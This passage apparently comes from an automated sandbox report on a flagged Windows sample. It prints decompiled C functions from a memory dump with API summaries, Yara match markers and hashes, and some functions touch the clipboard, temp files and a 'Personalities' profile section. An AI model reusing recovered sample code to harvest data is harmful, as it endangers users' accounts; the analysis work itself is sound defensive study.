						CloseHandle(_v8);
					}
				}
				return _v20;
			}
































                                                                        0x0040e25d
                                                                        0x0040e265
                                                                        0x0040e267
                                                                        0x0040e271
                                                                        0x0040e395
                                                                        0x0040e39b
                                                                        0x0040e3a1
                                                                        0x0040e3aa
                                                                        0x0040e3ad
                                                                        0x0040e3c0
                                                                        0x0040e3c7
                                                                        0x0040e3cd
                                                                        0x0040e44a
                                                                        0x0040e3e2
                                                                        0x0040e3ed
                                                                        0x0040e401
                                                                        0x0040e407
                                                                        0x0040e412
                                                                        0x0040e41b
                                                                        0x0040e41e
                                                                        0x0040e42b
                                                                        0x0040e438
                                                                        0x0040e444
                                                                        0x00000000
                                                                        0x0040e444
                                                                        0x00000000
                                                                        0x0040e438
                                                                        0x00000000
                                                                        0x0040e44a
                                                                        0x0040e3ad
                                                                        0x0040e283
                                                                        0x0040e28c
                                                                        0x0040e294
                                                                        0x0040e297
                                                                        0x0040e2a0
                                                                        0x0040e2a1
                                                                        0x0040e2ac
                                                                        0x0040e2ad
                                                                        0x0040e2b6
                                                                        0x0040e2bc
                                                                        0x0040e2bc
                                                                        0x0040e2c0
                                                                        0x0040e2c7
                                                                        0x0040e2ca
                                                                        0x0040e2d9
                                                                        0x0040e2e2
                                                                        0x0040e2e9
                                                                        0x0040e2fb
                                                                        0x0040e306
                                                                        0x0040e30d
                                                                        0x0040e311
                                                                        0x0040e322
                                                                        0x0040e328
                                                                        0x0040e33a
                                                                        0x0040e33f
                                                                        0x0040e344
                                                                        0x0040e345
                                                                        0x0040e34b
                                                                        0x0040e356
                                                                        0x0040e35b
                                                                        0x0040e361
                                                                        0x0040e361
                                                                        0x0040e375
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040e37b
                                                                        0x0040e384
                                                                        0x0040e2d7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040e38a
                                                                        0x00000000
                                                                        0x0040e384
                                                                        0x0040e2d9
                                                                        0x0040e2ca
                                                                        0x0040e44e
                                                                        0x0040e451
                                                                        0x0040e451
                                                                        0x0040e297
                                                                        0x0040e45e

                                                                        APIs
                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040DD5F,00000000,00000000), ref: 0040E28C
                                                                        • memset.MSVCRT ref: 0040E2E9
                                                                        • memset.MSVCRT ref: 0040E2FB
                                                                          • Part of subcall function 0040E172: strcpy.MSVCRT(?,-00000001), ref: 0040E198
                                                                        • memset.MSVCRT ref: 0040E3E2
                                                                        • strcpy.MSVCRT(?,?,?,00000000,00000118), ref: 0040E407
                                                                        • CloseHandle.KERNEL32(00000000,0040DD5F,?), ref: 0040E451
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: memset$strcpy$CloseHandleOpenProcess
                                                                        • String ID:
                                                                        • API String ID: 3799309942-0
                                                                        • Opcode ID: 090a920ccff3a4e303efb007cbafe5d1b02941aedbce4837af1c52a6e7a2511d
                                                                        • Instruction ID: 14fca006082a3f7ea55a807dd49808cd12c96cdbdfea8439eb00a9ee5a281ce1
                                                                        • Opcode Fuzzy Hash: 090a920ccff3a4e303efb007cbafe5d1b02941aedbce4837af1c52a6e7a2511d
                                                                        • Instruction Fuzzy Hash: A2512DB1900218ABDB10DF95DC85ADEBBB8FF44304F1045AAF609B6291D7749F90CF69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00410A8A, Relevance: 9.1, APIs: 6, Instructions: 96stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 73%
                                                                        			E00410A8A(void* __ecx, void* __eflags, intOrPtr* _a4, int _a8) {
				void* _v8;
				intOrPtr* _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v288;
				intOrPtr _v800;
				char _v1568;
				char _v1824;
				intOrPtr _v1828;
				intOrPtr _v1840;
				intOrPtr _v1844;
				intOrPtr _v2100;
				intOrPtr _v2612;
				char _v3124;
				char _v3636;
				intOrPtr _v3640;
				void* _v5768;
				char _v5796;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t39;
				intOrPtr _t51;
				int _t60;
				intOrPtr* _t73;
				int _t76;
				void* _t80;

				_t80 = __eflags;
				E004118A0(0x16a0, __ecx);
				_t39 = wcslen(_a8);
				_t2 =  &(_t39[1]); // 0x1
				_t76 = _t2;
				_push(_t76);
				L004115D0();
				_t60 = 0;
				_v8 = _t39;
				 *_t39 = 0;
				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t39, _t76, 0, 0);
				_t77 =  &_v5796;
				E0040FE05( &_v5796, _t80);
				_v5796 = 0x4144ac;
				E004104BC( &_v3636);
				E004104BC( &_v1824);
				_t73 = _a4;
				_v3640 =  *((intOrPtr*)(_t73 + 4));
				_v12 = _t73;
				_a8 = strlen(_v8);
				E0040FF76(_t47, _t77);
				memcpy(_v5768, _v8, _a8);
				E00410081(_t77, _t80);
				_t51 =  *((intOrPtr*)(_t73 + 4));
				_v1840 = _t51;
				_v28 = _t51;
				if(_v2100 != 0 || _v2612 != 0) {
					if(_v1844 != _t60) {
						if(_v1568 != _t60) {
							E004060D0(0xff,  &_v3124,  &_v1568);
							_t73 = _a4;
							_v1828 = _v24;
							_t60 = 0;
						}
						 *((intOrPtr*)( *_t73))( &_v3636);
					}
				}
				if(_v288 != _t60 || _v800 != _t60) {
					if(_v32 != _t60) {
						 *((intOrPtr*)( *_t73))( &_v1824);
					}
				}
				_push(_v8);
				L004115D6();
				return E0040FEED( &_v5796);
			}































                                                                        0x00410a8a
                                                                        0x00410a92
                                                                        0x00410a9d
                                                                        0x00410aa2
                                                                        0x00410aa2
                                                                        0x00410aa5
                                                                        0x00410aa6
                                                                        0x00410aad
                                                                        0x00410ab8
                                                                        0x00410abd
                                                                        0x00410abf
                                                                        0x00410ac5
                                                                        0x00410acb
                                                                        0x00410ad6
                                                                        0x00410ae0
                                                                        0x00410aeb
                                                                        0x00410af0
                                                                        0x00410af9
                                                                        0x00410aff
                                                                        0x00410b08
                                                                        0x00410b0b
                                                                        0x00410b1c
                                                                        0x00410b26
                                                                        0x00410b31
                                                                        0x00410b34
                                                                        0x00410b3a
                                                                        0x00410b3d
                                                                        0x00410b4d
                                                                        0x00410b55
                                                                        0x00410b69
                                                                        0x00410b71
                                                                        0x00410b75
                                                                        0x00410b7b
                                                                        0x00410b7b
                                                                        0x00410b88
                                                                        0x00410b88
                                                                        0x00410b4d
                                                                        0x00410b90
                                                                        0x00410b9d
                                                                        0x00410baa
                                                                        0x00410baa
                                                                        0x00410b9d
                                                                        0x00410bac
                                                                        0x00410baf
                                                                        0x00410bc4

                                                                        APIs
                                                                        • wcslen.MSVCRT ref: 00410A9D
                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 00410AA6
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00410C2C,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,00410C2C,?,00000000), ref: 00410ABF
                                                                          • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FE1A
                                                                          • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FE38
                                                                          • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FE53
                                                                          • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FE7C
                                                                          • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FEA0
                                                                        • strlen.MSVCRT ref: 00410B02
                                                                          • Part of subcall function 0040FF76: ??3@YAXPAX@Z.MSVCRT ref: 0040FF81
                                                                          • Part of subcall function 0040FF76: ??2@YAPAXI@Z.MSVCRT ref: 0040FF90
                                                                        • memcpy.MSVCRT ref: 00410B1C
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 00410BAF
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                        • String ID:
                                                                        • API String ID: 577244452-0
                                                                        • Opcode ID: eda384fdfc038d1513b3794fcc6cadf0bacc3feb473f8e14eb1b45133d0eb622
                                                                        • Instruction ID: 5b66efc9566b80317fa540751e9ebc59d69584110078b55da7be64cca713082c
                                                                        • Opcode Fuzzy Hash: eda384fdfc038d1513b3794fcc6cadf0bacc3feb473f8e14eb1b45133d0eb622
                                                                        • Instruction Fuzzy Hash: 44317672804219AFCF21EFA1C8809EDBBB5AF44314F1440AAE508A3251DB796FC4CF98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00406491, Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 72%
                                                                        			E00406491(void* __edx, struct HWND__* _a4) {
				int _v8;
				struct tagRECT _v24;
				int _t17;
				void* _t36;
				struct HDC__* _t38;

				_t36 = __edx;
				_t38 = GetDC(0);
				_t17 = GetDeviceCaps(_t38, 8);
				_v8 = GetDeviceCaps(_t38, 0xa);
				ReleaseDC(0, _t38);
				GetWindowRect(_a4,  &_v24);
				asm("cdq");
				asm("cdq");
				return MoveWindow(_a4, _v24.left - _v24.right + _t17 - 1 - _t36 >> 1, _v24.top - _v24.bottom + _v8 - 1 - _v8 >> 1, _v24.right - _v24.left + 1, _v24.bottom - _v24.top + 1, 1);
			}








                                                                        0x00406491
                                                                        0x004064a8
                                                                        0x004064ad
                                                                        0x004064b9
                                                                        0x004064bc
                                                                        0x004064c9
                                                                        0x004064e1
                                                                        0x004064f5
                                                                        0x00406511

                                                                        APIs
                                                                        • GetDC.USER32(00000000), ref: 0040649C
                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 004064AD
                                                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 004064B4
                                                                        • ReleaseDC.USER32 ref: 004064BC
                                                                        • GetWindowRect.USER32 ref: 004064C9
                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00406507
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CapsDeviceWindow$MoveRectRelease
                                                                        • String ID:
                                                                        • API String ID: 3197862061-0
                                                                        • Opcode ID: 69bb305ff33d1457d4484e576323a0ef66f31560397ccb35d966ff8f0e758d9b
                                                                        • Instruction ID: 542b186de9fc11de55873c3549d90df3c6ab5362d14aa96611489808ae4c73e2
                                                                        • Opcode Fuzzy Hash: 69bb305ff33d1457d4484e576323a0ef66f31560397ccb35d966ff8f0e758d9b
                                                                        • Instruction Fuzzy Hash: FC117C31A0011AAFDB009BB9CE4DEEFBFB8EB84711F014165E901E7250D6B0AD01CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00403A8D, Relevance: 9.1, APIs: 6, Instructions: 56filestringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 95%
                                                                        			E00403A8D(void* __ecx, void* __eflags, void* _a4, char* _a8) {
				long _v8;
				void _v8199;
				char _v8200;
				void _v24582;
				short _v24584;

				E004118A0(0x6004, __ecx);
				_v24584 = 0;
				memset( &_v24582, 0, 0x3ffe);
				_v8200 = 0;
				memset( &_v8199, 0, 0x1fff);
				MultiByteToWideChar(0, 0, _a8, 0xffffffff,  &_v24584, 0x1fff);
				WideCharToMultiByte(0xfde9, 0,  &_v24584, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
			}








                                                                        0x00403a95
                                                                        0x00403aab
                                                                        0x00403ab2
                                                                        0x00403ac5
                                                                        0x00403acb
                                                                        0x00403ae2
                                                                        0x00403b01
                                                                        0x00403b2d

                                                                        APIs
                                                                        • memset.MSVCRT ref: 00403AB2
                                                                        • memset.MSVCRT ref: 00403ACB
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AE2
                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403B01
                                                                        • strlen.MSVCRT ref: 00403B13
                                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403B24
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWidememset$FileWritestrlen
                                                                        • String ID:
                                                                        • API String ID: 1786725549-0
                                                                        • Opcode ID: f625be7e6fa724cc13b0b56902c1b33cd6369ef039f23dbe168f1e8392359ec1
                                                                        • Instruction ID: d8056d974a042835a8b53dd5956248081512f57f3cb7fafeec888b91cb2496ed
                                                                        • Opcode Fuzzy Hash: f625be7e6fa724cc13b0b56902c1b33cd6369ef039f23dbe168f1e8392359ec1
                                                                        • Instruction Fuzzy Hash: 6A1161B244012CBEFB009B94DD85DEB77ADEF08354F0041A6B70AD2091D6349F94CB78
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040AC8A, Relevance: 9.1, APIs: 6, Instructions: 54fileclipboardCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0040AC8A(void* __eax, void* __ebx) {
				char _v264;
				char _v524;
				void* __edi;
				void* __esi;
				long _t13;
				void* _t18;
				int _t19;
				long _t20;
				void* _t27;
				void* _t31;

				_t27 = __ebx;
				_t31 = __eax;
				_t13 = GetTempPathA(0x104,  &_v524);
				_t32 = _t13;
				if(_t13 == 0) {
					GetWindowsDirectoryA( &_v524, 0x104);
				}
				_v264 = 0;
				GetTempFileNameA( &_v524, "cp", 0,  &_v264);
				_t18 = E0040AC47(_t31, _t32,  &_v264, 2, 1);
				if(_t18 != 0) {
					_t19 = OpenClipboard( *(_t31 + 0x108));
					_t34 = _t19;
					if(_t19 == 0) {
						_t20 = GetLastError();
					} else {
						_t20 = E00405FC6(_t27, 0x104, _t31, _t34,  &_v264);
					}
					if(_t20 != 0) {
						E00405F41(_t20,  *(_t31 + 0x108));
					}
					return DeleteFileA( &_v264);
				}
				return _t18;
			}













                                                                        0x0040ac8a
                                                                        0x0040ac95
                                                                        0x0040aca4
                                                                        0x0040acaa
                                                                        0x0040acac
                                                                        0x0040acb6
                                                                        0x0040acb6
                                                                        0x0040acd1
                                                                        0x0040acd8
                                                                        0x0040ace9
                                                                        0x0040acf0
                                                                        0x0040acf8
                                                                        0x0040acfe
                                                                        0x0040ad00
                                                                        0x0040ad11
                                                                        0x0040ad02
                                                                        0x0040ad09
                                                                        0x0040ad0e
                                                                        0x0040ad19
                                                                        0x0040ad21
                                                                        0x0040ad26
                                                                        0x00000000
                                                                        0x0040ad2e
                                                                        0x0040ad37

                                                                        APIs
                                                                        • GetTempPathA.KERNEL32(00000104,?), ref: 0040ACA4
                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040ACB6
                                                                        • GetTempFileNameA.KERNEL32(?,0041341C,00000000,?), ref: 0040ACD8
                                                                        • OpenClipboard.USER32(?), ref: 0040ACF8
                                                                        • GetLastError.KERNEL32 ref: 0040AD11
                                                                        • DeleteFileA.KERNEL32(00000000), ref: 0040AD2E
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                                        • String ID:
                                                                        • API String ID: 2014771361-0
                                                                        • Opcode ID: 04f759ef316dfc5a7bfb4e8c49b84bbeab9ff02a57951bdc03c1b9a7e5f51390
                                                                        • Instruction ID: 1632bef886f39339d389646b63a05c30f7573d4ca20e624e383ab74febbb07e7
                                                                        • Opcode Fuzzy Hash: 04f759ef316dfc5a7bfb4e8c49b84bbeab9ff02a57951bdc03c1b9a7e5f51390
                                                                        • Instruction Fuzzy Hash: E0118272504318ABDB209B60DD49FDB77BC9F14701F0001B6F689E2091DBB8DAD4CB29
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00406585, Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 53stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 86%
                                                                        			E00406585(char* __edi, intOrPtr _a4, signed int _a8) {
				void _v259;
				char _v260;
				char* _t34;
				signed int _t35;
				void* _t36;
				void* _t37;

				_t34 = __edi;
				_v260 = 0;
				memset( &_v259, 0, 0xfe);
				_t37 = _t36 + 0xc;
				 *__edi = 0;
				_t35 = 0;
				do {
					_push( *(_t35 + _a4) & 0x000000ff);
					sprintf( &_v260, "%2.2X");
					_t37 = _t37 + 0xc;
					if(_t35 > 0) {
						strcat(_t34, " ");
					}
					if(_a8 > 0) {
						asm("cdq");
						if(_t35 % _a8 == 0) {
							strcat(_t34, "  ");
						}
					}
					strcat(_t34,  &_v260);
					_t35 = _t35 + 1;
				} while (_t35 < 0x80);
				return _t34;
			}









                                                                        0x00406585
                                                                        0x0040659d
                                                                        0x004065a4
                                                                        0x004065a9
                                                                        0x004065ac
                                                                        0x004065af
                                                                        0x004065b1
                                                                        0x004065b8
                                                                        0x004065c5
                                                                        0x004065ca
                                                                        0x004065cf
                                                                        0x004065d7
                                                                        0x004065dd
                                                                        0x004065e2
                                                                        0x004065e6
                                                                        0x004065ec
                                                                        0x004065f4
                                                                        0x004065fa
                                                                        0x004065ec
                                                                        0x00406603
                                                                        0x00406608
                                                                        0x00406610
                                                                        0x00406617

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: strcat$memsetsprintf
                                                                        • String ID: %2.2X
                                                                        • API String ID: 582077193-791839006
                                                                        • Opcode ID: f03ef531f1dceed6107a024529effe878a92871925f9b5c2fb8bf99f2bcc600c
                                                                        • Instruction ID: 9ba21b13147b7bc42f3eaeb5b708c7057566a78b4f06b3a82068ff28b5e275af
                                                                        • Opcode Fuzzy Hash: f03ef531f1dceed6107a024529effe878a92871925f9b5c2fb8bf99f2bcc600c
                                                                        • Instruction Fuzzy Hash: 54014C7294421476D7315725ED03BEA379C9B84704F10407FF986A61C5EABCDBD48798
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040FEED, Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 77%
                                                                        			E0040FEED(intOrPtr* __edi) {
				void* __esi;
				signed int _t9;
				intOrPtr* _t16;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr _t22;

				_t16 = __edi;
				_t9 =  *(__edi + 0x1c);
				 *__edi = 0x414288;
				if(_t9 != 0) {
					_push(_t9);
					L004115D6();
					 *(__edi + 0x1c) =  *(__edi + 0x1c) & 0x00000000;
				}
				_t18 =  *((intOrPtr*)(_t16 + 0x460));
				if(_t18 != 0) {
					_t9 = E00406B5B(_t18);
					_push(_t18);
					L004115D6();
				}
				_t19 =  *((intOrPtr*)(_t16 + 0x45c));
				if(_t19 != 0) {
					_t9 = E00406B5B(_t19);
					_push(_t19);
					L004115D6();
				}
				_t20 =  *((intOrPtr*)(_t16 + 0x458));
				if(_t20 != 0) {
					_t9 = E00406B5B(_t20);
					_push(_t20);
					L004115D6();
				}
				_t21 =  *((intOrPtr*)(_t16 + 0x454));
				if(_t21 != 0) {
					_t9 = E00406A4E(_t21);
					_push(_t21);
					L004115D6();
				}
				_t22 =  *((intOrPtr*)(_t16 + 0x450));
				if(_t22 != 0) {
					_t9 = E00406A4E(_t22);
					_push(_t22);
					L004115D6();
				}
				return _t9;
			}











                                                                        0x0040feed
                                                                        0x0040feed
                                                                        0x0040fef2
                                                                        0x0040fef8
                                                                        0x0040fefa
                                                                        0x0040fefb
                                                                        0x0040ff00
                                                                        0x0040ff04
                                                                        0x0040ff06
                                                                        0x0040ff0e
                                                                        0x0040ff10
                                                                        0x0040ff15
                                                                        0x0040ff16
                                                                        0x0040ff1b
                                                                        0x0040ff1c
                                                                        0x0040ff24
                                                                        0x0040ff26
                                                                        0x0040ff2b
                                                                        0x0040ff2c
                                                                        0x0040ff31
                                                                        0x0040ff32
                                                                        0x0040ff3a
                                                                        0x0040ff3c
                                                                        0x0040ff41
                                                                        0x0040ff42
                                                                        0x0040ff47
                                                                        0x0040ff48
                                                                        0x0040ff50
                                                                        0x0040ff52
                                                                        0x0040ff57
                                                                        0x0040ff58
                                                                        0x0040ff5d
                                                                        0x0040ff5e
                                                                        0x0040ff66
                                                                        0x0040ff68
                                                                        0x0040ff6d
                                                                        0x0040ff6e
                                                                        0x0040ff73
                                                                        0x0040ff75

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ??3@
                                                                        • String ID:
                                                                        • API String ID: 613200358-0
                                                                        • Opcode ID: ea111159704be43e2a104ffdb8d509d36bb5885e2519feaa300ca6788f6abc2c
                                                                        • Instruction ID: b81094b12df4fb27198692459327ff2c1ceec6e662cd9000025ff3e54110b63d
                                                                        • Opcode Fuzzy Hash: ea111159704be43e2a104ffdb8d509d36bb5885e2519feaa300ca6788f6abc2c
                                                                        • Instruction Fuzzy Hash: B0015E72A029322AC5257B26680178AA3557F41B14B06013FFA0577B824F7C799246ED
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004078FF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 100stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 36%
                                                                        			E004078FF(signed short __ebx) {
				signed int _t17;
				void* _t18;
				intOrPtr _t23;
				void* _t31;
				signed short _t39;
				signed int _t40;
				void* _t51;
				int _t56;
				void* _t57;
				int _t67;

				_t39 = __ebx;
				if( *0x417540 == 0) {
					E0040787D();
				}
				_t40 =  *0x417538;
				_t17 = 0;
				if(_t40 <= 0) {
					L5:
					_t51 = 0;
				} else {
					while(_t39 !=  *((intOrPtr*)( *0x417530 + _t17 * 4))) {
						_t17 = _t17 + 1;
						if(_t17 < _t40) {
							continue;
						} else {
							goto L5;
						}
						goto L6;
					}
					_t51 =  *((intOrPtr*)( *0x417534 + _t17 * 4)) +  *0x417528;
				}
				L6:
				if(_t51 != 0) {
					L22:
					_t18 = _t51;
				} else {
					if((_t39 & 0x00010000) == 0) {
						if( *0x4171b8 == 0) {
							_push( *0x417548 - 1);
							_push( *0x41752c);
							_push(_t39);
							_push(E00407A55());
							goto L16;
						} else {
							strcpy(0x4172c0, "strings");
							_t31 = E00407D89(_t39,  *0x41752c);
							_t57 = _t57 + 0x10;
							if(_t31 == 0) {
								L14:
								_push( *0x417548 - 1);
								_push( *0x41752c);
								_push(_t39);
								goto L9;
							} else {
								_t56 = strlen( *0x41752c);
								if(_t56 == 0) {
									goto L14;
								}
							}
						}
					} else {
						_push( *0x417548 - 1);
						_push( *0x41752c);
						_push(_t39 & 0x0000ffff);
						L9:
						_push( *0x416b94);
						L16:
						_t56 = LoadStringA();
						_t67 = _t56;
					}
					if(_t67 <= 0) {
						L21:
						_t18 = 0x412466;
					} else {
						_t23 =  *0x41753c;
						if(_t23 + _t56 + 2 >=  *0x417540 ||  *0x417538 >=  *0x417544) {
							goto L21;
						} else {
							_t51 = _t23 +  *0x417528;
							_t10 = _t56 + 1; // 0x1
							memcpy(_t51,  *0x41752c, _t10);
							 *((intOrPtr*)( *0x417534 +  *0x417538 * 4)) =  *0x41753c;
							 *( *0x417530 +  *0x417538 * 4) = _t39;
							 *0x417538 =  *0x417538 + 1;
							 *0x41753c =  *0x41753c + _t56 + 1;
							if(_t51 != 0) {
								goto L22;
							} else {
								goto L21;
							}
						}
					}
				}
				return _t18;
			}













                                                                        0x004078ff
                                                                        0x00407906
                                                                        0x00407908
                                                                        0x00407908
                                                                        0x0040790d
                                                                        0x00407914
                                                                        0x00407919
                                                                        0x0040792b
                                                                        0x0040792b
                                                                        0x0040791b
                                                                        0x0040791b
                                                                        0x00407926
                                                                        0x00407929
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407929
                                                                        0x0040795f
                                                                        0x0040795f
                                                                        0x0040792d
                                                                        0x0040792f
                                                                        0x00407a50
                                                                        0x00407a50
                                                                        0x00407935
                                                                        0x0040793b
                                                                        0x0040796e
                                                                        0x004079ba
                                                                        0x004079bb
                                                                        0x004079c1
                                                                        0x004079c7
                                                                        0x00000000
                                                                        0x00407970
                                                                        0x0040797a
                                                                        0x00407986
                                                                        0x0040798b
                                                                        0x00407990
                                                                        0x004079a4
                                                                        0x004079aa
                                                                        0x004079ab
                                                                        0x004079b1
                                                                        0x00000000
                                                                        0x00407992
                                                                        0x0040799d
                                                                        0x004079a2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004079a2
                                                                        0x00407990
                                                                        0x0040793d
                                                                        0x00407943
                                                                        0x00407944
                                                                        0x0040794d
                                                                        0x0040794e
                                                                        0x0040794e
                                                                        0x004079c8
                                                                        0x004079ce
                                                                        0x004079d0
                                                                        0x004079d0
                                                                        0x004079d2
                                                                        0x00407a49
                                                                        0x00407a49
                                                                        0x004079d4
                                                                        0x004079d4
                                                                        0x004079e3
                                                                        0x00000000
                                                                        0x004079f3
                                                                        0x004079f9
                                                                        0x004079fc
                                                                        0x00407a07
                                                                        0x00407a1d
                                                                        0x00407a2b
                                                                        0x00407a36
                                                                        0x00407a42
                                                                        0x00407a47
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407a47
                                                                        0x004079e3
                                                                        0x004079d2
                                                                        0x00407a54

                                                                        APIs
                                                                        • strcpy.MSVCRT(004172C0,strings,?,?,00408822,?,?,?,?,?,00000000,73B74DE0), ref: 0040797A
                                                                          • Part of subcall function 00407D89: _itoa.MSVCRT ref: 00407DAA
                                                                        • strlen.MSVCRT ref: 00407998
                                                                        • LoadStringA.USER32 ref: 004079C8
                                                                        • memcpy.MSVCRT ref: 00407A07
                                                                          • Part of subcall function 0040787D: ??2@YAPAXI@Z.MSVCRT ref: 004078A5
                                                                          • Part of subcall function 0040787D: ??2@YAPAXI@Z.MSVCRT ref: 004078C3
                                                                          • Part of subcall function 0040787D: ??2@YAPAXI@Z.MSVCRT ref: 004078E1
                                                                          • Part of subcall function 0040787D: ??2@YAPAXI@Z.MSVCRT ref: 004078F1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ??2@$LoadString_itoamemcpystrcpystrlen
                                                                        • String ID: strings
                                                                        • API String ID: 1748916193-3030018805
                                                                        • Opcode ID: bf392a6dacac5d0c9eb1169d992c8844a823b81d6c84b2abf61d961779fc3ee1
                                                                        • Instruction ID: bfec9983b2359add980c5e43b0d452c2fda20e15e3ba6c634c10b5a9b6e313b6
                                                                        • Opcode Fuzzy Hash: bf392a6dacac5d0c9eb1169d992c8844a823b81d6c84b2abf61d961779fc3ee1
                                                                        • Instruction Fuzzy Hash: F73189B1A8C101BFD7159B59FD80DB63377EB84304710807AE902A7AB1E639B851CF9D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040329E, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0040329E(void* __fp0, intOrPtr _a4) {
				int _v8;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				void _v1035;
				char _v1036;
				char _v1968;
				char _v2900;
				void* __esi;
				void* _t23;
				int _t30;
				char* _t31;
				CHAR* _t49;
				void* _t50;
				void* _t55;

				_t62 = __fp0;
				_t49 = _a4 + 0xd2a;
				if( *_t49 != 0) {
					_t52 =  &_v1968;
					E004021D8( &_v1968);
					if(E0040314D(_t52, _t49, 0) != 0) {
						E00402407(_t52, __fp0, _a4);
					}
					_v1036 = 0;
					memset( &_v1035, 0, 0x400);
					_t30 = GetPrivateProfileSectionA("Personalities",  &_v1036, 0x3fe, _t49);
					if(_t30 <= 0) {
						L11:
						return _t30;
					} else {
						_v12 = 0;
						_v13 = 0;
						_v14 = 0;
